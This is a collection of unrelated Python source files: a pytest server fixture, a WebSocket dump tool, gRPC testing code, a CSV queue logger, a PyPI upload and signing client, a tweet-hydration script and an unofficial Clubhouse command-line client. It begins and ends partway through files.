self.contents = f.read()
self.size = len(self.contents)
@pytest.fixture(scope='function')
def server():
return Server()
@pytest.fixture(scope='session')
def live_server():
s = socket.socket()
s.bind(("localhost", 0))
port = s.getsockname()[1]
s.close()
server = Server()
def run():
server.app.run(host='127.0.0.1', port=port, debug=False)
proc = Process(target=run)
proc.start()
address = '127.0.0.1:{}'.format(port)
success = False
for _ in range(20):
try:
urlopen('http://{}'.format(address))
success = True
break
except Exception:
time.sleep(0.5)
if not success:
raise Exception('Cannot connect to server.')
yield address
proc.terminate()
|
wsdump.py | #!/home/ledger/ledger-ibithub/ledger/bin/python
import argparse
import code
import sys
import threading
import time
import ssl
import gzip
import zlib
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = list(map(str.strip, args.headers.split(',')))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if isinstance(data, bytes) and len(data)>2 and data[:2] == b'\037\213': # gzip magick
try:
data = "[gzip] " + str(gzip.decompress(data), "utf-8")
except:
pass
elif isinstance(data, bytes):
try:
data = "[zlib] " + str(zlib.decompress(data, -zlib.MAX_WBITS), "utf-8")
except:
pass
if isinstance(data, bytes):
data = repr(data)
if args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
else:
msg = data
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
_rpc.py | # Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import grpc
from grpc_testing import _common
class Rpc(object):
def __init__(self, handler, invocation_metadata):
self._condition = threading.Condition()
self._handler = handler
self._invocation_metadata = invocation_metadata
self._initial_metadata_sent = False
self._pending_trailing_metadata = None
self._pending_code = None
self._pending_details = None
self._callbacks = []
self._active = True
self._rpc_errors = []
def _ensure_initial_metadata_sent(self):
if not self._initial_metadata_sent:
self._handler.send_initial_metadata(_common.FUSSED_EMPTY_METADATA)
self._initial_metadata_sent = True
def _call_back(self):
callbacks = tuple(self._callbacks)
self._callbacks = None
def call_back():
for callback in callbacks:
try:
callback()
except Exception: # pylint: disable=broad-except
logging.exception('Exception calling server-side callback!')
callback_calling_thread = threading.Thread(target=call_back)
callback_calling_thread.start()
def _terminate(self, trailing_metadata, code, details):
if self._active:
self._active = False
self._handler.send_termination(trailing_metadata, code, details)
self._call_back()
self._condition.notify_all()
def _complete(self):
if self._pending_trailing_metadata is None:
trailing_metadata = _common.FUSSED_EMPTY_METADATA
else:
trailing_metadata = self._pending_trailing_metadata
if self._pending_code is None:
code = grpc.StatusCode.OK
else:
code = self._pending_code
details = '' if self._pending_details is None else self._pending_details
self._terminate(trailing_metadata, code, details)
def _abort(self, code, details):
self._terminate(_common.FUSSED_EMPTY_METADATA, code, details)
def add_rpc_error(self, rpc_error):
with self._condition:
self._rpc_errors.append(rpc_error)
def application_cancel(self):
with self._condition:
self._abort(grpc.StatusCode.CANCELLED,
'Cancelled by server-side application!')
def application_exception_abort(self, exception):
with self._condition:
if exception not in self._rpc_errors:
logging.exception('Exception calling application!')
self._abort(
grpc.StatusCode.UNKNOWN,
'Exception calling application: {}'.format(exception))
def extrinsic_abort(self):
with self._condition:
if self._active:
self._active = False
self._call_back()
self._condition.notify_all()
def unary_response_complete(self, response):
with self._condition:
self._ensure_initial_metadata_sent()
self._handler.add_response(response)
self._complete()
def stream_response(self, response):
with self._condition:
self._ensure_initial_metadata_sent()
self._handler.add_response(response)
def stream_response_complete(self):
with self._condition:
self._ensure_initial_metadata_sent()
self._complete()
def send_initial_metadata(self, initial_metadata):
with self._condition:
if self._initial_metadata_sent:
return False
else:
self._handler.send_initial_metadata(initial_metadata)
self._initial_metadata_sent = True
return True
def is_active(self):
with self._condition:
return self._active
def add_callback(self, callback):
with self._condition:
if self._callbacks is None:
return False
else:
self._callbacks.append(callback)
return True
def invocation_metadata(self):
with self._condition:
return self._invocation_metadata
def set_trailing_metadata(self, trailing_metadata):
with self._condition:
self._pending_trailing_metadata = trailing_metadata
def set_code(self, code):
with self._condition:
self._pending_code = code
def set_details(self, details):
with self._condition:
self._pending_details = details
|
queue_logger.py | import multiprocessing as mp
import csv
class QueueLogger(object):
"""
Records data from a multiprocessing.Queue to an output file
Attributes
----------
filename : string
Name of the output file to write to
buffersize : unsigned int
Number of results to collect from the queue before writing them to file
buffer : list
Used to cache results as read from the queue so that the output file need
not be reopened for writing after each Queue.get() call
count : unsigned int
Number of times the write method as been called. Used to set the write mode
to create a file on the initial call and append to it for subsequent calls.
"""
def __init__(self,filename,quantities,buffersize,total):
"""
Create a QueueLogger object that will read from a multiprocessing.Queue,
store results in a buffer, and write the buffer to an output file when
it is full or the queue is empty. A watcher process must be created in order
to use this object.
Parameters
----------
filename : string
Name of the output file to write to
quantities : list of strings
Names of quantities to be evaluated and recorded
buffersize : unsigned int
Number of results to collect from the queue before writing them to file
total : unsigned int
Number of items expected in the queue. Used for reporting progress.
Example
-------
>>> import multiprocessing as mp
>>> ql = QueueLogger('output.txt',50)
>>> qresults = mp.Queue()
>>> watcher = mp.Process(target=ql.read,args=(qresults,))
>>> watcher.start()
# Run some processes that write to qresults
>>> watcher.terminate()
"""
self.filename = filename
self.buffersize = buffersize
self.buffer = list()
self.count = 0
self.progress = 0
self.total = total
with open(self.filename,'w') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(quantities)
def read(self,q):
"""
Read results from a queue and append them to the buffer. Write the buffer
to a file when full or the queue is empty
Parameters
----------
q : multiprocessing.Queue
"""
print("\n\nCompute Progress:")
print("0.00%")
while True:
while not q.empty():
result = q.get()
self.buffer.append(result)
if len(self.buffer) >= self.buffersize:
self.progress += len(self.buffer)
self.write_buffer()
print("{:.2%}".format(self.progress/self.total))
def write_buffer(self):
with open(self.filename,'a') as csvfile:
writer = csv.writer(csvfile)
while len(self.buffer):
b = self.buffer.pop()
if b is not None:
writer.writerow(b)
self.count += 1
|
index.py | # -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import hashlib
import logging
import os
import shutil
import subprocess
import tempfile
try:
from threading import Thread
except ImportError:
from dummy_threading import Thread
from . import DistlibException
from .compat import (
HTTPBasicAuthHandler,
Request,
HTTPPasswordMgr,
urlparse,
build_opener,
string_types,
)
from .util import zip_dir, ServerProxy
logger = logging.getLogger(__name__)
DEFAULT_INDEX = "https://pypi.org/pypi"
DEFAULT_REALM = "pypi"
class PackageIndex(object):
"""
This class represents a package index compatible with PyPI, the Python
Package Index.
"""
boundary = b"----------ThIs_Is_tHe_distlib_index_bouNdaRY_$"
def __init__(self, url=None):
"""
Initialise an instance.
:param url: The URL of the index. If not specified, the URL for PyPI is
used.
"""
self.url = url or DEFAULT_INDEX
self.read_configuration()
scheme, netloc, path, params, query, frag = urlparse(self.url)
if params or query or frag or scheme not in ("http", "https"):
raise DistlibException("invalid repository: %s" % self.url)
self.password_handler = None
self.ssl_verifier = None
self.gpg = None
self.gpg_home = None
with open(os.devnull, "w") as sink:
# Use gpg by default rather than gpg2, as gpg2 insists on
# prompting for passwords
for s in ("gpg", "gpg2"):
try:
rc = subprocess.check_call(
[s, "--version"], stdout=sink, stderr=sink
)
if rc == 0:
self.gpg = s
break
except OSError:
pass
def _get_pypirc_command(self):
"""
Get the distutils command for interacting with PyPI configurations.
:return: the command.
"""
from .util import _get_pypirc_command as cmd
return cmd()
def read_configuration(self):
"""
Read the PyPI access configuration as supported by distutils. This populates
``username``, ``password``, ``realm`` and ``url`` attributes from the
configuration.
"""
from .util import _load_pypirc
cfg = _load_pypirc(self)
self.username = cfg.get("username")
self.password = cfg.get("password")
self.realm = cfg.get("realm", "pypi")
self.url = cfg.get("repository", self.url)
def save_configuration(self):
"""
Save the PyPI access configuration. You must have set ``username`` and
``password`` attributes before calling this method.
"""
self.check_credentials()
from .util import _store_pypirc
_store_pypirc(self)
def check_credentials(self):
"""
Check that ``username`` and ``password`` have been set, and raise an
exception if not.
"""
if self.username is None or self.password is None:
raise DistlibException("username and password must be set")
pm = HTTPPasswordMgr()
_, netloc, _, _, _, _ = urlparse(self.url)
pm.add_password(self.realm, netloc, self.username, self.password)
self.password_handler = HTTPBasicAuthHandler(pm)
def register(self, metadata):
"""
Register a distribution on PyPI, using the provided metadata.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the distribution to be
registered.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
metadata.validate()
d = metadata.todict()
d[":action"] = "verify"
request = self.encode_request(d.items(), [])
response = self.send_request(request)
d[":action"] = "submit"
request = self.encode_request(d.items(), [])
return self.send_request(request)
def _reader(self, name, stream, outbuf):
"""
Thread runner for reading lines of from a subprocess into a buffer.
:param name: The logical name of the stream (used for logging only).
:param stream: The stream to read from. This will typically a pipe
connected to the output stream of a subprocess.
:param outbuf: The list to append the read lines to.
"""
while True:
s = stream.readline()
if not s:
break
s = s.decode("utf-8").rstrip()
outbuf.append(s)
logger.debug("%s: %s" % (name, s))
stream.close()
def get_sign_command(self, filename, signer, sign_password, keystore=None):
"""
Return a suitable command for signing a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The signing command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, "--status-fd", "2", "--no-tty"]
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(["--homedir", keystore])
if sign_password is not None:
cmd.extend(["--batch", "--passphrase-fd", "0"])
td = tempfile.mkdtemp()
sf = os.path.join(td, os.path.basename(filename) + ".asc")
cmd.extend(
[
"--detach-sign",
"--armor",
"--local-user",
signer,
"--output",
sf,
filename,
]
)
logger.debug("invoking: %s", " ".join(cmd))
return cmd, sf
def run_command(self, cmd, input_data=None):
"""
Run a command in a child process , passing it any input data specified.
:param cmd: The command to run.
:param input_data: If specified, this must be a byte string containing
data to be sent to the child process.
:return: A tuple consisting of the subprocess' exit code, a list of
lines read from the subprocess' ``stdout``, and a list of
lines read from the subprocess' ``stderr``.
"""
kwargs = {
"stdout": subprocess.PIPE,
"stderr": subprocess.PIPE,
}
if input_data is not None:
kwargs["stdin"] = subprocess.PIPE
stdout = []
stderr = []
p = subprocess.Popen(cmd, **kwargs)
# We don't use communicate() here because we may need to
# get clever with interacting with the command
t1 = Thread(target=self._reader, args=("stdout", p.stdout, stdout))
t1.start()
t2 = Thread(target=self._reader, args=("stderr", p.stderr, stderr))
t2.start()
if input_data is not None:
p.stdin.write(input_data)
p.stdin.close()
p.wait()
t1.join()
t2.join()
return p.returncode, stdout, stderr
def sign_file(self, filename, signer, sign_password, keystore=None):
"""
Sign a file.
:param filename: The pathname to the file to be signed.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The absolute pathname of the file where the signature is
stored.
"""
cmd, sig_file = self.get_sign_command(filename, signer, sign_password, keystore)
rc, stdout, stderr = self.run_command(cmd, sign_password.encode("utf-8"))
if rc != 0:
raise DistlibException("sign command failed with error " "code %s" % rc)
return sig_file
def upload_file(
self,
metadata,
filename,
signer=None,
sign_password=None,
filetype="sdist",
pyversion="source",
keystore=None,
):
"""
Upload a release file to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the file to be uploaded.
:param filename: The pathname of the file to be uploaded.
:param signer: The identifier of the signer of the file.
:param sign_password: The passphrase for the signer's
private key used for signing.
:param filetype: The type of the file being uploaded. This is the
distutils command which produced that file, e.g.
``sdist`` or ``bdist_wheel``.
:param pyversion: The version of Python which the release relates
to. For code compatible with any Python, this would
be ``source``, otherwise it would be e.g. ``3.2``.
:param keystore: The path to a directory which contains the keys
used in signing. If not specified, the instance's
``gpg_home`` attribute is used instead.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.exists(filename):
raise DistlibException("not found: %s" % filename)
metadata.validate()
d = metadata.todict()
sig_file = None
if signer:
if not self.gpg:
logger.warning("no signing program available - not signed")
else:
sig_file = self.sign_file(filename, signer, sign_password, keystore)
with open(filename, "rb") as f:
file_data = f.read()
md5_digest = hashlib.md5(file_data).hexdigest()
sha256_digest = hashlib.sha256(file_data).hexdigest()
d.update(
{
":action": "file_upload",
"protocol_version": "1",
"filetype": filetype,
"pyversion": pyversion,
"md5_digest": md5_digest,
"sha256_digest": sha256_digest,
}
)
files = [("content", os.path.basename(filename), file_data)]
if sig_file:
with open(sig_file, "rb") as f:
sig_data = f.read()
files.append(("gpg_signature", os.path.basename(sig_file), sig_data))
shutil.rmtree(os.path.dirname(sig_file))
request = self.encode_request(d.items(), files)
return self.send_request(request)
def upload_documentation(self, metadata, doc_dir):
"""
Upload documentation to the index.
:param metadata: A :class:`Metadata` instance defining at least a name
and version number for the documentation to be
uploaded.
:param doc_dir: The pathname of the directory which contains the
documentation. This should be the directory that
contains the ``index.html`` for the documentation.
:return: The HTTP response received from PyPI upon submission of the
request.
"""
self.check_credentials()
if not os.path.isdir(doc_dir):
raise DistlibException("not a directory: %r" % doc_dir)
fn = os.path.join(doc_dir, "index.html")
if not os.path.exists(fn):
raise DistlibException("not found: %r" % fn)
metadata.validate()
name, version = metadata.name, metadata.version
zip_data = zip_dir(doc_dir).getvalue()
fields = [(":action", "doc_upload"), ("name", name), ("version", version)]
files = [("content", name, zip_data)]
request = self.encode_request(fields, files)
return self.send_request(request)
def get_verify_command(self, signature_filename, data_filename, keystore=None):
"""
Return a suitable command for verifying a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: The verifying command as a list suitable to be
passed to :class:`subprocess.Popen`.
"""
cmd = [self.gpg, "--status-fd", "2", "--no-tty"]
if keystore is None:
keystore = self.gpg_home
if keystore:
cmd.extend(["--homedir", keystore])
cmd.extend(["--verify", signature_filename, data_filename])
logger.debug("invoking: %s", " ".join(cmd))
return cmd
def verify_signature(self, signature_filename, data_filename, keystore=None):
"""
Verify a signature for a file.
:param signature_filename: The pathname to the file containing the
signature.
:param data_filename: The pathname to the file containing the
signed data.
:param keystore: The path to a directory which contains the keys
used in verification. If not specified, the
instance's ``gpg_home`` attribute is used instead.
:return: True if the signature was verified, else False.
"""
if not self.gpg:
raise DistlibException(
"verification unavailable because gpg " "unavailable"
)
cmd = self.get_verify_command(signature_filename, data_filename, keystore)
rc, stdout, stderr = self.run_command(cmd)
if rc not in (0, 1):
raise DistlibException("verify command failed with error " "code %s" % rc)
return rc == 0
def download_file(self, url, destfile, digest=None, reporthook=None):
"""
This is a convenience method for downloading a file from an URL.
Normally, this will be a file from the index, though currently
no check is made for this (i.e. a file can be downloaded from
anywhere).
The method is just like the :func:`urlretrieve` function in the
standard library, except that it allows digest computation to be
done during download and checking that the downloaded data
matched any expected value.
:param url: The URL of the file to be downloaded (assumed to be
available via an HTTP GET request).
:param destfile: The pathname where the downloaded file is to be
saved.
:param digest: If specified, this must be a (hasher, value)
tuple, where hasher is the algorithm used (e.g.
``'md5'``) and ``value`` is the expected value.
:param reporthook: The same as for :func:`urlretrieve` in the
standard library.
"""
if digest is None:
digester = None
logger.debug("No digest specified")
else:
if isinstance(digest, (list, tuple)):
hasher, digest = digest
else:
hasher = "md5"
digester = getattr(hashlib, hasher)()
logger.debug("Digest specified: %s" % digest)
# The following code is equivalent to urlretrieve.
# We need to do it this way so that we can compute the
# digest of the file as we go.
with open(destfile, "wb") as dfp:
# addinfourl is not a context manager on 2.x
# so we have to use try/finally
sfp = self.send_request(Request(url))
try:
headers = sfp.info()
blocksize = 8192
size = -1
read = 0
blocknum = 0
if "content-length" in headers:
size = int(headers["Content-Length"])
if reporthook:
reporthook(blocknum, blocksize, size)
while True:
block = sfp.read(blocksize)
if not block:
break
read += len(block)
dfp.write(block)
if digester:
digester.update(block)
blocknum += 1
if reporthook:
reporthook(blocknum, blocksize, size)
finally:
sfp.close()
# check that we got the whole file, if we can
if size >= 0 and read < size:
raise DistlibException(
"retrieval incomplete: got only %d out of %d bytes" % (read, size)
)
# if we have a digest, it must match.
if digester:
actual = digester.hexdigest()
if digest != actual:
raise DistlibException(
"%s digest mismatch for %s: expected "
"%s, got %s" % (hasher, destfile, digest, actual)
)
logger.debug("Digest verified: %s", digest)
def send_request(self, req):
"""
Send a standard library :class:`Request` to PyPI and return its
response.
:param req: The request to send.
:return: The HTTP response from PyPI (a standard library HTTPResponse).
"""
handlers = []
if self.password_handler:
handlers.append(self.password_handler)
if self.ssl_verifier:
handlers.append(self.ssl_verifier)
opener = build_opener(*handlers)
return opener.open(req)
def encode_request(self, fields, files):
"""
Encode fields and files for posting to an HTTP server.
:param fields: The fields to send as a list of (fieldname, value)
tuples.
:param files: The files to send as a list of (fieldname, filename,
file_bytes) tuple.
"""
# Adapted from packaging, which in turn was adapted from
# http://code.activestate.com/recipes/146306
parts = []
boundary = self.boundary
for k, values in fields:
if not isinstance(values, (list, tuple)):
values = [values]
for v in values:
parts.extend(
(
b"--" + boundary,
('Content-Disposition: form-data; name="%s"' % k).encode(
"utf-8"
),
b"",
v.encode("utf-8"),
)
)
for key, filename, value in files:
parts.extend(
(
b"--" + boundary,
(
'Content-Disposition: form-data; name="%s"; filename="%s"'
% (key, filename)
).encode("utf-8"),
b"",
value,
)
)
parts.extend((b"--" + boundary + b"--", b""))
body = b"\r\n".join(parts)
ct = b"multipart/form-data; boundary=" + boundary
headers = {"Content-type": ct, "Content-length": str(len(body))}
return Request(self.url, body, headers)
def search(self, terms, operator=None):
if isinstance(terms, string_types):
terms = {"name": terms}
rpc_proxy = ServerProxy(self.url, timeout=3.0)
try:
return rpc_proxy.search(terms, operator or "and")
finally:
rpc_proxy("close")()
|
my_hydrated.py | from twarc import Twarc
import json
from pathlib import Path
import os
import gzip
import time
from tqdm import tqdm
from multiprocessing import Process, SimpleQueue
from utils import load_configs
def hydrate(cfs):
jobs = []
squeue = SimpleQueue()
data_dirs = ['2020-01', '2020-02', '2020-03', '2020-04']
# create folder here to avoid data racing
if not os.path.isdir('hydrated'):
os.makedirs('hydrated')
for data_dir in data_dirs:
full = os.path.join('hydrated', data_dir)
print(full)
if not os.path.isdir(full):
os.makedirs(full)
fc_process = Process(target=file_creator, args=(squeue, len(cfs),))
jobs.append(fc_process)
fc_process.daemon = True
fc_process.start()
for cf in cfs:
# unpack keys
account = cf['account']
p = Process(target=hydrated_cycle, args=(account, squeue,))
jobs.append(p)
p.daemon = True
p.start()
[j.join() for j in jobs]
def file_creator(squeue, n_workers):
data_dirs = ['2020-01', '2020-02', '2020-03', '2020-04']
for data_dir in data_dirs:
for p in Path("COVID-19-TweetIDs/" + data_dir).iterdir():
if p.name.endswith(".txt"):
partial_path = os.path.join(data_dir, p.name)
print("inserting:", partial_path)
squeue.put(partial_path)
# n work done indicator
for _ in range(n_workers):
squeue.put("done")
def hydrated_cycle(account, squeue):
twarc = Twarc(**account)
while True:
working_path = squeue.get()
if(working_path == "done"):
print('job done')
gzip_path = os.path.join(
"hydrated/",
working_path.split("/")[0],
working_path.split("/")[-1][:-4]+".jsonl.gz")
print(gzip_path)
hydrate_file(working_path, twarc, gzip_path)
def hydrate_file(id_file, twarc, gzip_path):
print("hydrating ", id_file)
# getting use the cached work
if os.path.isfile(gzip_path):
print("skipping jsonl file already exists: ", gzip_path)
return
# # set prograss bar totoal ids
# f = open(id_file, 'rb')
# f_gen = _reader_generator(f.raw.read)
# total_ids = sum(buf.count(b'\n') for buf in f_gen)
with gzip.open(gzip_path, 'w') as output:
for tweet in twarc.hydrate(open("COVID-19-TweetIDs/"+id_file)):
# simply write to a gzip file and remove pbar
if(tweet['place']):
if(tweet['place']["country_code"].strip() == 'AU'):
print(tweet['place']["country_code"], gzip_path)
output.write(json.dumps(tweet).encode('utf-8') + b"\n")
def _reader_generator(reader):
b = reader(1024 * 1024)
while b:
yield b
b = reader(1024 * 1024)
if __name__ == "__main__":
cfs = load_configs()
hydrate(cfs)
|
newcli5.py | """
cli.py
Sample CLI Clubhouse Client
RTC: For voice communication
"""
import os
import sys
import threading
import configparser
import keyboard
import time
from rich.table import Table
from rich.console import Console
from clubhouse.clubhouse import Clubhouse
# Set some global variables
try:
import agorartc
RTC = agorartc.createRtcEngineBridge()
eventHandler = agorartc.RtcEngineEventHandlerBase()
RTC.initEventHandler(eventHandler)
# 0xFFFFFFFE will exclude Chinese servers from Agora's servers.
RTC.initialize(Clubhouse.AGORA_KEY, None, agorartc.AREA_CODE_GLOB & 0xFFFFFFFE)
# Enhance voice quality
if RTC.setAudioProfile(
agorartc.AUDIO_PROFILE_MUSIC_HIGH_QUALITY_STEREO,
agorartc.AUDIO_SCENARIO_GAME_STREAMING
) < 0:
print("[-] Failed to set the high quality audio profile")
except ImportError:
RTC = None
def set_interval(interval):
""" (int) -> decorator
set_interval decorator
"""
def decorator(func):
def wrap(*args, **kwargs):
stopped = threading.Event()
def loop():
while not stopped.wait(interval):
ret = func(*args, **kwargs)
if not ret:
break
thread = threading.Thread(target=loop)
thread.daemon = True
thread.start()
return stopped
return wrap
return decorator
def write_config(user_id, user_token, user_device, filename='setting.ini'):
""" (str, str, str, str) -> bool
Write Config. return True on successful file write
"""
config = configparser.ConfigParser()
config["Account"] = {
"user_device": user_device,
"user_id": user_id,
"user_token": user_token,
}
with open(filename, 'w') as config_file:
config.write(config_file)
return True
def read_config(filename='setting.ini'):
""" (str) -> dict of str
Read Config
"""
config = configparser.ConfigParser()
config.read(filename)
if "Account" in config:
return dict(config['Account'])
return dict()
def process_onboarding(client):
""" (Clubhouse) -> NoneType
This is to process the initial setup for the first time user.
"""
print("=" * 30)
print("Welcome to Clubhouse!\n")
print("The registration is not yet complete.")
print("Finish the process by entering your legal name and your username.")
print("WARNING: THIS FEATURE IS PURELY EXPERIMENTAL.")
print(" YOU CAN GET BANNED FOR REGISTERING FROM THE CLI ACCOUNT.")
print("=" * 30)
while True:
user_realname = input("[.] Enter your legal name (John Smith): ")
user_username = input("[.] Enter your username (elonmusk1234): ")
user_realname_split = user_realname.split(" ")
if len(user_realname_split) != 2:
print("[-] Please enter your legal name properly.")
continue
if not (user_realname_split[0].isalpha() and
user_realname_split[1].isalpha()):
print("[-] Your legal name is supposed to be written in alphabets only.")
continue
if len(user_username) > 16:
print("[-] Your username exceeds above 16 characters.")
continue
if not user_username.isalnum():
print("[-] Your username is supposed to be in alphanumerics only.")
continue
client.update_name(user_realname)
result = client.update_username(user_username)
if not result['success']:
print(f"[-] You failed to update your username. ({result})")
continue
result = client.check_waitlist_status()
if not result['success']:
print("[-] Your registration failed.")
print(f" It's better to sign up from a real device. ({result})")
continue
print("[-] Registration Complete!")
print(" Try registering by real device if this process pops again.")
break
def print_channel_list(client, max_limit=200):
""" (Clubhouse) -> NoneType
Print list of channels
"""
# Get channels and print out
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("")
table.add_column("channel_name", style="cyan", justify="right")
table.add_column("topic")
table.add_column("speaker_count")
ids = "14710025"
for id in ids.split(","):
channels = client.follow(user_id=id)
time.sleep(5)
##channels = client.search_users(query="Aatman shah")
print(channels)
channels = client.follow_multiple(ids)
print(channels)
# i = 0
# for channel in channels:
# i += 1
# # if i > max_limit:
# # break
# _option = ""
# _option += "\xEE\x85\x84" if channel['is_social_mode'] or channel['is_private'] else ""
# table.add_row(
# str(_option),
# str(channel['name']),
# str(channel['description']))
console.print(table)
def chat_main(client):
""" (Clubhouse) -> NoneType
Main function for chat
"""
max_limit = 200
channel_speaker_permission = False
_wait_func = None
_ping_func = None
def _request_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Raise hands for permissions
"""
if not channel_speaker_permission:
client.audience_reply(channel_name, True, False)
_wait_func = _wait_speaker_permission(client, channel_name, user_id)
print("[/] You've raised your hand. Wait for the moderator to give you the permission.")
@set_interval(30)
def _ping_keep_alive(client, channel_name):
""" (str) -> bool
Continue to ping alive every 30 seconds.
"""
client.active_ping(channel_name)
return True
@set_interval(10)
def _wait_speaker_permission(client, channel_name, user_id):
""" (str) -> bool
Function that runs when you've requested for a voice permission.
"""
# Get some random users from the channel.
_channel_info = client.get_channel(channel_name)
if _channel_info['success']:
for _user in _channel_info['users']:
if _user['user_id'] != user_id:
user_id = _user['user_id']
break
# Check if the moderator allowed your request.
res_inv = client.accept_speaker_invite(channel_name, user_id)
if res_inv['success']:
print("[-] Now you have a speaker permission.")
print(" Please re-join this channel to activate a permission.")
return False
return True
while True:
# Choose which channel to enter.
# Join the talk on success.
user_id = client.HEADERS.get("CH-UserID")
print_channel_list(client, max_limit)
channel_name = input("[.] Enter channel_name: ")
channel_info = client.join_channel(channel_name)
if not channel_info['success']:
# Check if this channel_name was taken from the link
channel_info = client.join_channel(channel_name, "link", "e30=")
if not channel_info['success']:
print(f"[-] Error while joining the channel ({channel_info['error_message']})")
continue
# List currently available users (TOP 20 only.)
# Also, check for the current user's speaker permission.
channel_speaker_permission = False
console = Console()
table = Table(show_header=True, header_style="bold magenta")
table.add_column("user_id", style="cyan", justify="right")
table.add_column("username")
table.add_column("name")
table.add_column("is_speaker")
table.add_column("is_moderator")
users = channel_info['users']
i = 0
for user in users:
i += 1
if i > max_limit:
break
table.add_row(
str(user['user_id']),
str(user['name']),
str(user['username']),
str(user['is_speaker']),
str(user['is_moderator']),
)
# Check if the user is the speaker
if user['user_id'] == int(user_id):
channel_speaker_permission = bool(user['is_speaker'])
console.print(table)
# Check for the voice level.
if RTC:
